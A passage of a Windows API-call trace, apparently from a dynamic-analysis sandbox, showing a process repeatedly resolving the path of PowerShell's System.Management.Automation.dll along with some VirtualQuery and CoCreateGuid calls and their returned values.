lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.814] VirtualQuery (in: lpAddress=0xcafc0, lpBuffer=0xcbe80, dwLength=0x30 | out: lpBuffer=0xcbe80*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.814] VirtualQuery (in: lpAddress=0xcb050, lpBuffer=0xcbf10, dwLength=0x30 | out: lpBuffer=0xcbf10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.815] VirtualQuery (in: lpAddress=0xcb270, lpBuffer=0xcc130, dwLength=0x30 | out: lpBuffer=0xcc130*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.815] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x53e544c8, Data2=0x4147, Data3=0x41c1, Data4=([0]=0x80, [1]=0xdf, [2]=0x3a, [3]=0x4c, [4]=0xeb, [5]=0x18, [6]=0xd3, [7]=0x6b))) returned 0x0 [0078.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.817] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xf536f67c, Data2=0x2ae0, Data3=0x4cce, Data4=([0]=0x9f, [1]=0x41, [2]=0xcd, [3]=0xd0, [4]=0x1, [5]=0x2b, [6]=0x37, [7]=0xee))) returned 0x0 [0078.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.817] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xbe55b261, Data2=0xe307, Data3=0x44a0, Data4=([0]=0x8f, [1]=0xba, [2]=0xcf, [3]=0x7f, [4]=0xa7, [5]=0x90, [6]=0x6e, [7]=0xec))) returned 0x0 [0078.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.818] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x8058640a, Data2=0x2852, Data3=0x4ea6, Data4=([0]=0x90, [1]=0xd3, [2]=0x0, [3]=0x1d, [4]=0x2c, [5]=0x76, [6]=0xc8, [7]=0x3a))) returned 0x0 [0078.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.819] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x93342d84, Data2=0xe9c9, Data3=0x4388, Data4=([0]=0x80, [1]=0x54, [2]=0x8c, [3]=0x76, [4]=0xec, [5]=0x52, [6]=0xcc, [7]=0xc3))) returned 0x0 [0078.820] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xdc37a50a, Data2=0x4c5c, Data3=0x48e3, Data4=([0]=0x8c, [1]=0xbd, [2]=0xdd, [3]=0x96, [4]=0x8b, [5]=0xa2, [6]=0xea, [7]=0x3))) returned 0x0 [0078.820] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x74baf5c5, Data2=0x4e1e, Data3=0x4305, Data4=([0]=0xb0, [1]=0x95, [2]=0x4d, [3]=0x56, [4]=0x75, [5]=0x4, [6]=0x94, [7]=0xc5))) returned 0x0 [0078.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) 